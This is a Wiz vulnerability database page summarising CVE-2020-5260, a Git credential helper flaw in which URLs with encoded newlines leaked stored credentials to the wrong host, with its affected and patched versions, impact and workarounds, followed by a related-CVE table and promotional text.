Wiz
Vulnerability DatabaseCVE-2020-5260

CVE-2020-5260
Git vulnerability analysis and mitigation

Overview

CVE-2020-5260 is a vulnerability in Git's credential helper system discovered by Felix Wilhelm of Google Project Zero and disclosed on April 14, 2020. The vulnerability affects Git versions up to 2.17.3, 2.18.2, 2.19.3, 2.20.2, 2.21.1, 2.22.2, 2.23.1, 2.24.1, 2.25.2, and 2.26.0. The issue allows malicious URLs containing encoded newlines to trick Git into sending stored credentials to the wrong server (GitHub Advisory).

Technical details

The vulnerability exists in Git's credential helper protocol that is used to store and retrieve passwords from secure operating system storage. When processing URLs containing specially-crafted encoded newlines, the credential helper machinery could be fooled into injecting unintended values into the protocol stream. This would cause the credential helper to retrieve credentials for one server (e.g., good.example.com) when making an HTTP request to another server (e.g., evil.example.com), resulting in credentials being sent to the wrong destination. The vulnerability has a CVSS 3.1 base score of 9.3 CRITICAL (NVD).

Impact

An attacker could craft a URL that would cause Git to present stored credentials for any host to a host of the attacker's choosing. There are no restrictions on the relationship between the two hosts, making this a serious credential exposure vulnerability. While the malicious URLs would look suspicious, the attack vector is particularly concerning for automated systems that clone URLs not visible to users, such as Git submodules or package systems built around Git (GitHub Advisory).

Mitigation and workarounds

The vulnerability was patched in Git versions 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, and 2.26.1 released on April 14, 2020. The fix prevents newline characters in credential protocol values. For users unable to upgrade immediately, workarounds include disabling credential helpers entirely or avoiding malicious URLs by examining hostnames and usernames for encoded newlines or evidence of credential protocol injections (GitHub Advisory).

Community reactions

The vulnerability was treated as a critical security issue, with major Linux distributions like Debian, Ubuntu, and Fedora quickly releasing security updates. Software projects using Git, such as Sourcetree, also released advisories and patches for their users (Sourcetree Advisory).

Additional resources

SourceThis report was generated using AI

Related Git vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-32465HIGH7.8
  • GitGit
  • cpe:2.3:a:git_project:git
NoYesMay 14, 2024
CVE-2024-52005HIGH7.5
  • GitGit
  • git-email
NoYesJan 15, 2025
CVE-2024-52006LOW2.1
  • GitGit
  • emacs-git-el
NoYesJan 14, 2025
CVE-2024-50349LOW2.1
  • GitGit
  • perl-Git-SVN
NoYesJan 14, 2025
ELSA-2025-11534HIGHN/A
  • GitGit
  • git-credential-libsecret
NoYesJul 22, 2025

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Additional Wiz resources

Cloud Vulnerability DB

Cloud Vulnerability DB

A community-led vulnerabilities database

Cloud Threat Landscape

Cloud Threat Landscape

A threat intelligence database

PEACH

PEACH

A tenant isolation framework

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management
Get a demo